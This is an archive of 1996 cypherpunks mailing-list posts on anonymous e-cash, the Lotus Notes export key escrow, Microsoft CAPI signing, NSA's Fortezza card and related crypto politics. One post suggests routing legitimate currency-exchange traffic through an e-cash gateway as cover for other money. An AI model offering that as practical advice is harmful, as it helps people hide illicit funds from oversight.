| > Certainly. There are a couple of ways, but all one needs is
| > some sort of  gateway to an e-cash

| This is the part that bothers me.  Wouldn't a gateway between anonymous  
| e-money and identified e-money would stick out like a sore thumb to  
| agencies tracking the flow of identified e-money?  Wouldn't identified  
| e-money trails start and/or terminate at the gateway?  Once the gateway is  
| discovered, all clients on the identified e-money side of the gateway  
| would be discovered.

	Anonymity only works when many people use it.  So yes, if the
gateway is discovered, the client list might be obtainable (unless
there are many entry points, each funnelling out through an point
thats designed to go down & be replaced.  Think remailer chains.)

	An ecash gateway could provide other services as well, say
currency conversion.  By offering rates slightly better than todays
market,* you can draw a lot of legit money through the system to act
as cover for other money.  Heck, people might even find its easier to
do business in the Seychelles than in New Orleans.

 *a trick which some shops play by timing their trades; if the
dollar is low today, buy a stack of dollars, when its high, sell your
excess.  Pass great rates onto your customers, and make very little on
each transaction.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 19 Jan 1996 00:43:19 +0800
To: "R. J. Harvey" <harveyrj@vt.edu>
Subject: Re: noise levels
In-Reply-To: <199601181533.KAA28653@sable.cc.vt.edu>
Message-ID: <199601181547.KAA06697@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"R. J. Harvey" writes:
> At 10:20 AM 1/18/96 -0500, Perry wrote:
> >
> >The noise levels around here are getting astounding.
> >
> >Posts on windows registration wizards, gun control, unemployment,
>           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>    Well, I'm sure you're correct on most of those,
> but the post on Microsoft using ENCRYPTED databases
> of competitor programs as part of its plan to surreptitiously

Actually, the database isn't encrypted -- its plaintext -- and the
wizard isn't surreptitious and tells you everything its doing and lets
you stop it if you like. In short, the topic has no cryptography
or security relevance *AT ALL*.

The posts on Microsoft's bad encryption for Windows passwords are
perfectly relevant, and I hope people don't confuse these issues.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 19 Jan 1996 01:03:38 +0800
To: cypherpunks@toad.com
Subject: (fwd) Crypto SmartDisk(tm)
Message-ID: <v02120d05ad2420fab27d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Sender: Postmaster@thumper.vmeng.com
Reply-To: e$@thumper.vmeng.com
Mime-Version: 1.0
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 18 Jan 1996 08:02:46 -0500
Precedence: Bulk
To: Multiple recipients of e$pam - Sent by <rah@shipwright.com>
Subject: Crypto SmartDisk(tm)


--- begin forwarded text

`Computer Within a Floppy Disk` puts secure electronic commerce in the palm of
your hand
SAN FRANCISCO--(BUSINESS WIRE)--Jan. 17, 1996--Fischer International Systems
Corp. (FISC) announced Wednesday the availability of Crypto SmartDisk(tm), the
world's first intelligent security token housed in a floppy disk-sized device.

The announcement was made at the annual conference of RSA Data Security Inc., a
leading encryption algorithm vendor. Addison M. Fischer, founder and chairman of
 FISC and a world-recognized leader in systems and data security, attended the
meeting with fellow experts in cryptography.

Crypto SmartDisk is a self-contained computer, complete with crypto coprocessor,
 memory, real time clock, and resident operating system. It fits in any of the
150 million installed standard 3.5 inch floppy disk drives; no additional
hardware is required.

Crypto SmartDisk supports RSA, DSA and DES algorithms for encryption and digital
 signatures. The RSA public key cryptographic system is the de facto standard
and is commonly used to create digital envelopes for secure electronic commerce.
 DSA is a standard for digital signatures that is endorsed by the U.S.
government, and DES is the most widely used and tested encryption algorithm
available.

`Crypto SmartDisk breaks barriers in the world of secure electronic commerce,`
said Michael S. Battaglia, FISC president and CEO. `It literally puts in any
user's hands the power to use any PC with a 3.5 inch floppy drive as a secure
electronic transaction station. Businesses, government agencies, even private
citizens can use Crypto SmartDisk to engage in secure electronic commerce with
complete confidence that their transactions will be read only by those people
the users intend.`

Crypto SmartDisk is positioned to gain rapid acceptance among agencies of the
U.S. federal government, particularly those that manage civilian applications.
It offers the benefits of hardware-based encryption without the expense of
retrofitting PCs that don't have card readers. By using a Crypto SmartDisk, for
example, private citizens could conduct secure electronic transactions with
agencies like the U.S. Postal Service (USPS), Social Security Administration
(SSA), and IRS from their home computers.

The General Services Administration Security Infrastructure Program Management
Office is planning just such a pilot project, with hundreds to thousands of
participants including private citizens. Using Crypto SmartDisk, participants
may conduct electronic transactions such as requesting SSA benefit information,
inquiring about the availability of federal loans, and potentially even filing
on-line tax returns with the IRS.

Crypto SmartDisk also offers a developer's toolkit so users can create their own
 applications featuring encryption capabilities. The toolkit provides both
software tools and libraries and is fully compliant with the PKCS No. 11
standard and the ISO 7816 standard.

Fischer International Systems Corp. is a leading worldwide supplier of software
solutions for secure Electronic Commerce. Founded in 1982, it is one of the
largest privately held software companies in the United States. Its products
include Watchdog(r) and SmartDisk(tm) for PC data security, TAO(tm) (Totally
Automated Office) for cross-platform, multilingual messaging and office
automation; EDI/comm(tm) for Electronic Data Interchange; and WorkFlow.2000(tm)
for cross-platform automated forms and process management.

Crypto SmartDisk and the Crypto SmartDisk toolkit are available for immediate
shipment. -0-

NOTE TO EDITORS: In the Internet/email address noted in the contact information
in this news release, there is an `at` symbol between Chamberlain and fisc.com.
This symbol may not appear properly in some systems.

--30--jd/mi.. CONTACT: Fischer International Systems Corp., Naples, Fla.
Katharen Chamberlain Phone: 941/436-2678; Fax: 941/436-2586 Internet:
Kathy.Chamberlain@fisc.com


============================================================================
--- end forwarded text


--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jleppek@suw2k.hisd.harris.com (James Leppek)
Date: Fri, 19 Jan 1996 19:13:57 +0800
To: cypherpunks@toad.com
Subject: authenticating intrahost crypto providers
Message-ID: <9601181637.AA01592@suw2k.hisd.harris.com>
MIME-Version: 1.0
Content-Type: text/plain



I have been doing some research on the development of an abstract
security services API(not just a CAPI) and have hit a road block. 
The problem revolves around the need to authenticate a 
security service provider to an application. I noticed 
that microsoft has followed a path of providing
a signature in each external provider but the feeling is that this
is not that difficult to circumvent. I have the same misgivings but cannot
come up with anything else. Are my misgivings unfounded???
What are some other possibilities to allow intrahost (application)
authentication of services. Do you need to actually have a cryptographic
binding of services?

Comments....

Jim Leppek
jleppek@suw2k.hisd.harris.com
Harris Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 19 Jan 1996 01:13:49 +0800
To: Trei Family <cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
In-Reply-To: <199601181451.JAA25153@iii2.iii.net>
Message-ID: <9601181638.AA01736@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I've been discussing the Lotus notes escrowed key reduction with some 
knowledgeable people. The first time I heard it suggested was by Adi Shamir at a 
talk by the deputy director of the NSA at MIT.

The problem with this system is that it is quite likely to suceed. Unlike 
Clipper which made unfettered access to encrypted material possible the escrowed 
key strength reduction means that the FBI can tap a significant number of 
locations, just not all of them.

It will be very hard to argue effectively against this idea in Congress. Much 
harder than the Clipper chip which was dead on arrival.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 19 Jan 1996 05:14:22 +0800
To: perry@piermont.com
Subject: Re: Win95 Registration Wizard info
Message-ID: <2.2.32.19960118194900.008a53d0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 1/18/96 -0500, Perry E. Metzger wrote:
>
>Alan Olsen writes:
>> I picked this link up from the Fringewear list.
>[...]
>> The author takes the registration Wizard in Win95 apart and shows exactly
>> what it does and what it looks for.  Some interesting information about the
>> encrypted database of product information it uses.
>
>What, exactly, does this have to do with cypherpunks?

I posted it for two reasons.  

1) There have been alot of rumors spread about what the Registration Wizard
does and does not do to comprimise your privacy.  This dispells many of
those rumors.

2) The program's use of encryption to conceal what products it looks for.

If I was going to post unrelated articles of that site, it would have been
the Win95 dirtly little secrets article and/or the Softram hoax.



Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 19 Jan 1996 05:15:46 +0800
To: cypherpunks@toad.com
Subject: Hack Lotus?
Message-ID: <2.2.32.19960118195838.008a4944@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


In reading the various descriptions of the mechanism used by Lotus, it seems
that such a method of GAKing the software is vulnerable to reverse engeneering.

I am certain that comparisons between the export and non-export (with
softice and other debugger-type software) will show some interesting things.
Hopefully such an action will reveal the backdoor.  After that point, just
publishing the hack will do more to remove the bogus gaking than any protest
will ever do...

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 19 Jan 1996 05:46:34 +0800
To: cypherpunks@toad.com
Subject: [NOISY 'cept to Peter et al] Potential Windows hack (fwd)
Message-ID: <Pine.ULT.3.91.960118122703.23073C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Yes, this would seem to be an intriguing new way to intruduce a trojan 
horse. 

-rich

---------- Forwarded message ----------
Date: Thu, 18 Jan 96 10:57:40 -0500
To: hackmsoft@c2.org
Subject: Potential Windows hack

I was messing around with Delphi last night, and for the first time
checked out the help files for creating Windows help. 

I was surprised to find that a Windows Help file can call functions from
any DLL. 

Is it just me, or does this seem like a hole big enough to drive a truck
through? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 19 Jan 1996 06:18:45 +0800
To: Patrick Lamb <cypherpunks@toad.com
Subject: [noise] Re: Attack Simulator
Message-ID: <2.2.32.19960118205437.008885a4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:04 PM 1/18/96 -0600, Patrick Lamb wrote:
>Is it just me, or does this sound like a commercial version of SATAN?  I
>wonder what makes SATAN unacceptable (besides the name) while something like
>this is apparently acceptable?

It is very similar, both in tests and in basic principle, to Satan.

The differences between the two are hype and Satan is free to anyone who can
figure how to make it work.  (Not always an easy task...  Especially on Linux.)

Such tools are very useful for system admin types to fix holes and for
hackers to find them. It is not the "all powerful hacker tool" the media
makes it out to be.

What this has to do with crypto, I have no idea...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 19 Jan 1996 06:08:57 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: (fwd) Crypto SmartDisk(tm)
In-Reply-To: <v02120d05ad2420fab27d@[199.0.65.105]>
Message-ID: <Pine.3.89.9601181259.A24585-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 18 Jan 1996, Robert Hettinga wrote:

> `Computer Within a Floppy Disk` puts secure electronic commerce in the palm of
> your hand
> SAN FRANCISCO--(BUSINESS WIRE)--Jan. 17, 1996--Fischer International Systems
> Corp. (FISC) announced Wednesday the availability of Crypto SmartDisk(tm), the
> world's first intelligent security token housed in a floppy disk-sized device.


The showed that disk at the RSA conference last year. Pretty neat. Got a 
transducer in it that emulates a floppy. They gave them away to all 
exhibitors. I got one myself.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 19 Jan 1996 05:20:32 +0800
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
Message-ID: <ad23e65c090210046157@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:51 PM 1/18/96, Trei Family wrote:
>I've come up with a new term to describe the type of 'improved' security
>in the new International edition of Lotus Notes:
>
>'espionage-enabled'
>
>It's specifically built for export, and has a backdoor to enable USG agents
>to read the messages more easily. From the viewpoint of a foreign purchaser,
>'espionage-enabled' seems an appropriate term.
>
>If we spread this term sufficiently, we may be able to discourage the
>widespread adoption of this half-measure, and increase the pressure for
>good, unencumbered crypto.

I like this idea, and have already begun to use it. Even adding it to my
already long .sig.

Here's a post I sent to talk.politics.crypto and soc.culture.german. (I
included the German group because of the CompuServe situation and the fact
that they are already incensed by American criticisms of them...I figure
this could get them even more riled up, and even get a groundswell of
sentiment to boycott espionage-enabled software.)

Here it is:


You Germans need to be monitored.  The French, too. This has become
painfully clear.

Fortunately, IBM and its Lotus Development division have come up with an
answer: software such as Lotus Notes which is shipped to Germany (and
elsewhere outside the U.S.) will have an espionage-enabled encryption
system that allows the National Security Agency, CIA, and other
intelligence agencies to have easy access to your data.

The 64-bit key versions of software will actually be crippled, to allow
the NSA and CIA access to your communications. And the NSA has been
exploring options for "economic espionage," as a means of helping U.S.
industry to compete. Thus, your BMW and Daimler-Benz secrets can be
detected and passed on to Ford, General Motors, and Chrysler.

Brief excerpts from today's "Wall Street Journal":

-------

IBM Compromises on Encryption Keys, U.S. Allows Export of
More-Secure Notes

By Thomas E. Weber

New York -- International Business Machines Corp., caving in
to intense government pressure, agreed to include a special
key that helps investigators tap into data messages in return
for permission to export a more-secure version of its Lotus
Notes software.
...
"We were desperate enough to try to negotiate a short-term,
pragmatic solution," Mr. Ozzie said. "But we do not believe
this is the right long-term solution."
....
The new overseas version of Notes, tagged Release 4, will give
foreign users 64-bit security. But to get permission to export
the software, Lotus agreed to give the government access to 24
of those bits by using a special 24-bit key supplied by the
National Security Agency.
...

-------


Welcome to the New American World Order.

(Of course, another possibility is the Europeans, Asians, and others will
reject this espionage-enabled software and will instead rely on robust
software using the Web, software with full cryptographic security and
without the special NSA "back doors." Some may even boycott Lotus
Development products on general principal.)

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 19 Jan 1996 05:09:25 +0800
To: cypherpunks@toad.com
Subject: re: CAPI signing
Message-ID: <9601181940.AA22979@alpha>
MIME-Version: 1.0
Content-Type: text/plain



A Microsoft person just responded via direct e-mail that they'll do
CAPI signing in the United States (the word "only" wasn't in there,
but that certainly was the implication).  This means, to me, that
there won't be much CAPI-compliant software produced outside the US,
or at least that people who do it will have to bear that insult.  It's
reminiscent of the Lotus thing.

I see no reason for Microsoft to be reluctant to have non-USA
signings other than fear of USGov reprisals.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 19 Jan 1996 11:58:33 +0800
To: mab@research.att.com
Subject: Re: Microsoft's CAPI
Message-ID: <m0td2IK-0008xrC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 AM 1/17/96 -0800, Alan Bostick wrote:

>> The OS will not load just any old CSP.  CSPs have to be signed by
>> Microsoft.  The kernel contains a (hardcoded?) 1024 RSA public key
>> that it uses to check the signature when the user tries to load a CSP.
>> If the signature check fails, the CSP won't load.  Microsoft says it
>> will sign any CSP from anyone AS LONG AS THEY CERTIFY THAT THEY WILL
>> FOLLOW THE EXPORT RULES.  So you can get your CSP signed if you use
>> exportable cryptography or if you agree not to send it outside the US
>> and Canada, etc.  But an end user can't just compile crypto code and
>> use it as a CSP, even for his or her own use, without getting it
>> signed by Microsoft first (actually, the CSP development kit does
>> allow this, but it uses a special version of the OS).
>
>The next obvious question is:  Will Microsoft sign strong-crypto CSPs
>developed by foreign developers for out-of-USA use?

And, as well, for in-USA-use.  Currently, it is only the export of
cryptographic devices and programs which is restricted.  Are they going to
prohibit the export of digital signatures which enable the use of
foreign-developed software?!?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lamb <pdlamb@iquest.com>
Date: Fri, 19 Jan 1996 05:23:02 +0800
To: cypherpunks@toad.com
Subject: Re: Attack Simulator
Message-ID: <199601182006.OAA26389@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:50 1/18/96 +0100, you wrote:
>
>Internet Scanner Software Checks Network Security 
>     
>Atlanta, Jan. 17 -- Internet Security Systems has
>released version 3.2 of its Internet Scanner software. 
>The company said the program is an "attack simulator"
>that tests your organization's network for security
>holes.  
>
...remainder of ad elided

Is it just me, or does this sound like a commercial version of SATAN?  I
wonder what makes SATAN unacceptable (besides the name) while something like
this is apparently acceptable?

        Pat
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzACleQAAAEH/2+41W3bZPuWU1gv6A0bq3a57bgCiCAbU1QY41f+NI1I8i/+
a/L314RIpCR0iCZhsNMHNI9rVovsbmOQE4Cf9YYL3cClUoE2VAsLOi9LAjlN8qYc
kmAqpsGQ39eaKrnlC/0lxJtFZgypT4m9UIsTU986y3gyy+ZTWwxtbDaLBEdsTiH/
e+zosoBiXmwWYY1n+5yvaKLGMUwa20AKdoRCUgqhJQpkW0nAvItU6WhaqxwH6JXp
KCNsuP6k8FBmcKZfSSvUphSOIJnARAq9K9UPhj5BeAy1vKZ416jfgeYQUTxHQOMT
rTiQOYR/oAR35gBpGYg6p1lu6Ma5eDPtpBPadUUABRG0IFBhdHJpY2sgTGFtYiA8
cGRsYW1iQGlxdWVzdC5jb20+
=DZzp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Thu, 18 Jan 1996 17:09:51 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft's CAPI
In-Reply-To: <pxT/w8m9LAcF085yn@netcom.com>
Message-ID: <199601180110.OAA12788@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Alan Bostick and I say ...
> The next obvious question is:  Will Microsoft sign strong-crypto CSPs
> developed by foreign developers for out-of-USA use?

To obvious really, if they signed strong foreign crypto MS would
neither be exporting strong crypto or exporting an application that
had general purpose crypto hooks, since technically only that specific
foreign implementation could be used.

However I would guess that the arrangement with the guvmint would
label the signing to be the equivalent of MS exporting an application
with strong crypto and subject to the same disciplinary measures, just
transfered to the time of signing.  Perhaps there will be some
modification to the itar - thou shalt not _enable_ foreign markets to
have strong crypto.

I assume MS would be free to sign weak foreign crypto, but as "weak"
crypto is hard/expensive to determine I think they would take the easy
way out.  Id also expect a kernel patch to be part of the install
procedure of foreign crypto.

--Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Fri, 19 Jan 1996 04:57:19 +0800
To: fstuart@vetmed.auburn.edu (Frank Stuart)
Subject: Re: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
In-Reply-To: <199601181652.KAA13172@snoopy.vetmed.auburn.edu>
Message-ID: <m0td0AT-000jSpC@gti.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Frank Stuart:
: 
: >The new overseas version of Notes, tagged Release 4, will give
: >foreign users 64-bit security. But to get permission to export
: >the software, Lotus agreed to give the government access to 24
: >of those bits by using a special 24-bit key supplied by the
:                         ^
: Does anyone know if there really is just one 24-bit key for every copy of
: Lotus Notes or is this a miscommunication?  If there really is just one 24-bit
: key for everyone, can't you just look for the bits that don't change among
: different 64 bit keys?  (e.g. AND a "sufficiently large" number of 64-bit keys
: together to find the 1's that don't change and then OR them to find the 0's
: until you've got the 24 bit key).  Someone, please tell me that's not how it
: works (or post the 24-bit key  :>).
: 

That was the question that came to mind when I read the article, too.
How exactly are they planning on implementing this?  I admit my ignorance
concerning the working of Lotus Notes and how it handles keys.  Do they 
plan on escrowing a unique partial key for each licence? For each user?
Can users have multiple keys?  If so, how does this affect the key generation 
process.  

At first glance, unless the feds are gonna hand out keys via 
men-with-shiny-black-shoes-and-handcuffed-to-briefcases, the key
generation process is going to have to contact the feds and reveal the key.
Of course, I'm relatively new to this (gonna read Schneier real soon now ;) )
so I may be woefully off base, but this is my first reaction.

Is this partial escrow similar to saying, "We won't kill you, we'll just
amputate at the neck?"

- -----
Mark Rogaski           100,000 lemmings     rogaski@pobox.com 
aka Doc, wendigo        can't be wrong!     http://www.pobox.com/~rogaski/

VMS is as secure as a poodle encased in a block of lucite 
						... about as useful, too.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMP6hltT48ZIkMoEtAQGXoAf/WvtLJNlK7TobMfRKUMMwPP8C/kyaV7Kp
Jkz3kzoCYUCg0+5XovHdlukVb1Bt+McgJAIEg6TABEyE2R/Le1oDp2HFc6R/k5Lm
q25yiqi2UyXECnozH4mVO+nS2kTgEn74Y66wFYggIzp8mgIgRmFSIesyGYPIxWAd
+N/m5edR+fKEFQgOqg7dsOid9pmpPHEDJiTVLB3xwnS1GPiIUf03eHilCutsANmS
4lAlIdGftVCGfo3iNkTPkGj+iXpmPF8IFfM/4oeiIhzl9tqXv8ZkOnV7uHCn5k7N
puyE9bJ5pDnByEnHs2qIKRdi3+QADK9uq1meoPNEyllsK+uNdpeQwg==
=CZ8F
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 19 Jan 1996 06:12:27 +0800
To: cypherpunks@toad.com
Subject: Re: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
Message-ID: <199601182115.PAA10170@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


// : >The new overseas version of Notes, tagged Release 4, will give
// : >foreign users 64-bit security. But to get permission to export
// : >the software, Lotus agreed to give the government access to 24
// : >of those bits by using a special 24-bit key supplied by the

// That was the question that came to mind when I read the article, too.
// How exactly are they planning on implementing this?  

Looks straightforward to me.  Any time a bulk key is generated (aka session
key), take a known number of bits in a known location (top n or bottom n)
and encrypt those with the public key of the agent you want to give the n
key bits to. 

Then send the encrypted key bits as part of the message protocol. 

This is similar to what Netscape's SSL does, except that the top n bits of
an SSL key are a public part of the exchange, and the top n bits of a Notes
key are only readable by the private key holder (which is presumably in the
hands of every major government agency that cares).

Neither give away the entire key directly, so it's not a trivial decoding
operation.  But 40 bits isn't terribly difficult to decode either.

The advantage, as seen by many people, is that the full key is much larger
in the Notes implementation style so non-governmental attackers have a much
harder problem to solve in order to crack the message.  

This is roughly akin to what ViaCrypt has announced for their next PGP
release.  You have a public key for the "escrow" agent, and every person
who encrypts using PGP would add (or would have added by PGP) the agent to
the list of recipients.  The message might not be given to the agent, but
if it lands in their hands, they will be able to decrypt it.

GAK is reasonable, to those who trust the government.  Now the subset of
this list who do so may be a much smaller percentage than the subset of the
VPs of IS that do.  But that's a different message.  

-- 
-  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
--  zoo@armadillo.com --|   unix generalist (and occasional specialist)
------------------------+   http://www.armadillo.com/ for more information
  pgp key upon request  +----------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@m-net.arbornet.org (Rishab Aiyer Ghosh)
Date: Fri, 19 Jan 1996 05:46:41 +0800
To: rishab@m-net.arbornet.org
Subject: Netscape and NSA
Message-ID: <m0td0rd-0009PVC@m-net148.arbornet.org>
MIME-Version: 1.0
Content-Type: text/plain



Any special reason why Netscape is working with
the NSA to support their Fortezza encryption card?

ObConspiracyTheory: Hmmmmm....

Nice government-friendly Jim Clark quote, with the rest of the story
http://www-e1c.gnn.com/gnn/wr/96/01/12/features/nsa/index.html

-Rishab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 19 Jan 1996 10:47:06 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Espionage-enabled Lotus notes.
In-Reply-To: <9601182245.AA01500@ch1d157nwk>
Message-ID: <Pine.SOL.3.91.960118153248.1318C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jan 1996, Andrew Loewenstern wrote:
> 
> I think it's also time to break out the old "Big Brother Inside" stickers and  
> start applying them to copies of Notes...

I'd love to know what Mitch Kapor has to say about all this..

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 19 Jan 1996 06:00:46 +0800
To: jim@bilbo.suite.com
Subject: Re: Article on E-money
Message-ID: <Pine.BSD.3.91.960118155239.20365A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Jim, 
 
 
  Thank you for an exceptionally well thought out message. 
 
  I notice your point that 
 
    ....governments will do their best to insure that anonymous 
    e-money systems fail in the marketplace. Perhaps by...subsi- 
    dizing identified e-money systems.... 
 
 
  12 26 95 / 01 02 96 Computerworld 38 reports: 
 
    CyberCash...is a more comfortable partner to banks and 
    offers an easier system for regulators to audit than those 
    of some rivals, says John Pescatore, research director for 
    information security at International Data Group in Falls 
    Church, Va. 
 
    A Netherlands-based firm called DigiCash BV...offers a system 
    that ensures a buyer's anonymity.... 
 
    "An approach like CyberCash would still keep financial insti- 
    tutions in the loop.  That's much more palatable to governments 
    and banks and their lobbyists," he says. 
 
 
  Publicizing the palatable is one form of subsidizing. 
 
  Another is suggested: 
 
    CyberCash...earns transaction fees from banks. 
 
 
  Regulating those fees can be an exercise in ingenuity. 
 
 
  But there may be more... 
 
  In Implementing Internet Security, a 1995 book recommended 
  by Pournelle, Lisa Morgan writes at page 199: 
 
    Currently, DigiCash technology is being used in electronic 
    wallets and smart cards; but in the long-term, the technology 
    will be used for many more applications. 
 
 
  In the long-term?   Lisa writes at page 195: 
 
    Internet commerce, when it becomes big business several 
    years from now.... 
 
 
  By then "NSA's pet Fortezza card project" may be all the 
  rage.  Stephen Pizzo, Web Review's senior reporter, says: 
 
    The agency is also heavily subsidizing through private com- 
    panies the development of a commercial version to be sold 
    worldwide. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTES: 
 
  The Computerworld newsstory is headlined "Virtual credit-card 
  swiper makes banks feel secure."  
 
  The book is by Frederic Cooper et al.  Its publisher: New 
  Riders Publishing. 
 
  Pizzo's report can be accessed beginning at: 
  
      http://gnn.com/gnn/wr/96/01/12/features/nsa/index.html 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 19 Jan 1996 06:18:44 +0800
To: rishab@m-net.arbornet.org (Rishab Aiyer Ghosh)
Subject: Re: Netscape and NSA
In-Reply-To: <m0td0rd-0009PVC@m-net148.arbornet.org>
Message-ID: <9601182117.AA02942@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Any special reason why Netscape is working with
>the NSA to support their Fortezza encryption card?

>ObConspiracyTheory: Hmmmmm....

I think it was a very special reason, $5 million by some accounts.

Given the govt. internal needs it is not unreasonable to supply them with 
the equipment they need. The problem is in the forcing of non governmental
personnel to use them.

There are an awfully large number of people on cypherpunks who have taken
money from the NSA in some form or another. About 5 ft from my office is the old 
CIA safe from the days they had an office in this building.

The US govt does not believe in socialist subsidies to industy. It beleives in 
corporativist subsidies in inflated military contracts. Boeing got them to build 
the 747 and now its time for Netscape to get their handout. If this upsets people 
I'd just like to point out that the farming lobby is even worse, taking those 
snouts out of the trough is long overdue in almost every industrialised country.


	Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 19 Jan 1996 06:19:07 +0800
To: cypherpunks@toad.com
